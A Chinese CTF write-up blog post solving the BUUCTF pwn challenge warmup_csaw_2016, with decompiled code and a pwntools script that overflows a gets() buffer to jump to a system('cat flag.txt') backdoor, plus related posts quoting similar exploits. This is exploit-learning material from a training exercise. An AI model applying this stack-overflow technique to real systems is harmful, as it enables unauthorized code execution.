buuctf warmup_csaw_2016

最新推荐文章于 2024-07-04 23:51:12 发布
最新推荐文章于 2024-07-04 23:51:12 发布
阅读量471 收藏
点赞数
分类专栏: ctf pwn 文章标签: c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yidalipao1/article/details/126679039
版权
ctf 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
pwn
2 篇文章 0 订阅
订阅专栏
本文详细分析了一次CTF比赛中的栈溢出漏洞问题。通过使用IDA分析64位程序,发现了一个可以利用的system函数调用。主要步骤包括找到main函数,识别关键函数sub_40060D,该函数用于执行`catflag.txt`获取flag。通过构造payload覆盖返回地址,成功触发栈溢出并执行命令。最终提供了一个EXP来演示漏洞利用过程,并展示了获取到的flag。
摘要由CSDN通过智能技术生成

buuctf warmup_csaw_2016

只开启了部分RELRO保护, 64位

用ida64位打开

先找到main函数

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF
​
  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}

可以看到在sprintf里有一个函数

int sub_40060D()
{
  return system("cat flag.txt");
}

他正是拿到flag需要执行的指令,所以这道题就是一个简单的栈溢出

最后需要输入的是gets,存储在v5之中

查看v5在栈中存储的位置

可以看出,s的地址是从0x41~x80,需要的v5的地址就是0~0x40,所以需要填充的地址就是0x40+8 (+8,就是覆盖64位下rbp的长度)

然后找到函数的首地址是0x40060D

EXP

from pwn import *
​
#io = remote("ip地址", 端口)
io = remote("node4.buuoj.cn", 25915)
​
payload = b'A' * (0x40 + 8) + p64(0x40060D)
​
io.writeline(payload)
​
io.interactive()

getflag

flag{03779684-e617-4068-9b1e-246435d4d2e5}

Eutop1a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1233
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3883
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
BUUCTF-PWN】3-warmup_csaw_2016
最新发布
燕麦葡萄干的博客
07-04 145
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
BUUCTF warmup_csaw_2016
m0_54262894的博客
08-20 346
BUUCTF warmup_csaw_2016 下载文件,把它拖入虚拟机中先checksec一下 这是一个64位的文件,并且没有开启任何的保护 我们先运行一下试试 发现它给出了一个地址,我们先记下,可能会用到 放入64位IDA中查看一下他的代码 伪C代码↓ 汇编代码↓ 发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址 下面是我搜索到的信息 我们双击40060D看一下 再回过头来看代码 众所周知gets函.
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 376
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 363
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
标题提到的"PyPI 官网下载 | warmup_scheduler-0.3.tar.gz"是指从PyPI网站上下载的一个名为`warmup_scheduler`的Python库的0.3版本的压缩包文件。这个文件通常包含了库的所有源代码、文档和其他必要的资源,以便在...
markdown_warmup_html
05-28
在“markdown_warmup_html”这个主题中,我们可以深入探讨Markdown和HTML的关联及各自特点。首先,Markdown提供了一种简单易学的语法,如`#`表示标题,`*`和`_`用于斜体和粗体,`-`和`*`创建无序列表,以及`>`用于...
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 402
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1332
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 391
和第一题RIP一样,是经典而基础的ret2text。
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 416
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
buuctf warmup
doudoudedi
01-28 562
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 450
64位的linux文件。
buuctfWarmUp
qq_38634097的博客
04-17 510
通过代码审计,我们知道了需要满足三个条件,前两个为file不为空且为字符串,那么可以构造pyload为:?file=hint.php.(我们已经知道source.php文件源码是什么了,所以直接用hint.php即可)我们已知,hint.php在白名单,flag在ffffllllaaaagggg,mb_strpos($page . '?结合已知条件,再次进行代码审计,寻找突破口。开题一张笑脸,无他,查看网页源码,看到提示source.php,在url后加/source.php,打开结果如下,
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1695
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
warmup_csaw_2016 1
03-16
这是一道CSAW 2016年的预热题目,需要我们在给定的字符串中找到所有的数字,并将它们相加起来。 具体的做法是,我们可以遍历字符串中的每一个字符,判断它是否是数字,如果是数字就将它转换成整数并加到总和中。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值